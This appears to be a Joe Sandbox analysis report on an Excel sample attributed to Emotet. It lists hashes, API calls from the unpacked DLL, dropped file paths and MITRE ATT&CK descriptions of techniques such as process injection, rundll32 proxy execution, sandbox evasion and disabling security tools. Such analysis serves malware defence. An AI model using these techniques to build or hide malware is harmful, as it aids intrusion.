Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50

Uniqueness

Uniqueness Score: -1.00%

Function 10006A90 Relevance: 18.4, APIs: 1, Instructions: 16933
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 10006A9C

Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E

Memory Dump Source

Source File: 0000000B.00000002.514931269.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.514920051.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.515118189.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.515134772.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.515140995.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.515147176.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54

Uniqueness

Uniqueness Score: -1.00%

Function 1002083B Relevance: 16.6, APIs: 11, Instructions: 103
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
GlobalHandle.KERNEL32(00587AD0), ref: 100208A9
GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
GlobalHandle.KERNEL32(00587AD0), ref: 100208DB
GlobalLock.KERNEL32 ref: 100208E2
LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
GlobalLock.KERNEL32 ref: 100208F8
_memset.LIBCMT ref: 10020911
LeaveCriticalSection.KERNEL32(?), ref: 1002093D

Memory Dump Source

Source File: 0000000B.00000002.514931269.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.514920051.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.515118189.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.515134772.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.515140995.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.515147176.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50

Uniqueness

Uniqueness Score: -1.00%

Function 1002FA69 Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 1002FA87

Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1

___sbh_find_block.LIBCMT ref: 1002FA92
___sbh_free_block.LIBCMT ref: 1002FAA1
HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2

Memory Dump Source

Source File: 0000000B.00000002.514931269.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.514920051.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.515118189.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.515134772.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.515140995.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.515147176.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92

Uniqueness

Uniqueness Score: -1.00%

Function 10036624 Relevance: 3.0, APIs: 2, Instructions: 28
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B

Memory Dump Source

Source File: 0000000B.00000002.514931269.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.514920051.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.515118189.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.515134772.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.515140995.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.515147176.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Heap$CreateDestroy
String ID:
API String ID: 3296620671-0
Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15

Uniqueness

Uniqueness Score: -1.00%

Function 100019C0 Relevance: 2.6, APIs: 2, Instructions: 115
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC

Memory Dump Source

Source File: 0000000B.00000002.514931269.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000B.00000002.514920051.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.515118189.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.515134772.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.515140995.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000B.00000002.515147176.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 364453688149503140239183.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Overview

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary

Jbx Signature Overview

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\QWER.dll

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm

C:\Users\user\AppData\Local\Temp\4B14.tmp

C:\Users\user\AppData\Local\Temp\~DF61981CC6FBEE46E0.TMP

C:\Users\user\AppData\Local\Temp\~DFB91905051C23B5E7.TMP

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1K4VR2PW3EG92IH5IDUU.temp

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

C:\Users\user\Desktop\364453688149503140239183.xls

C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz (copy)

Static File Info

General

File Icon

Static OLE Info

Windows Analysis Report
364453688149503140239183.xls

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre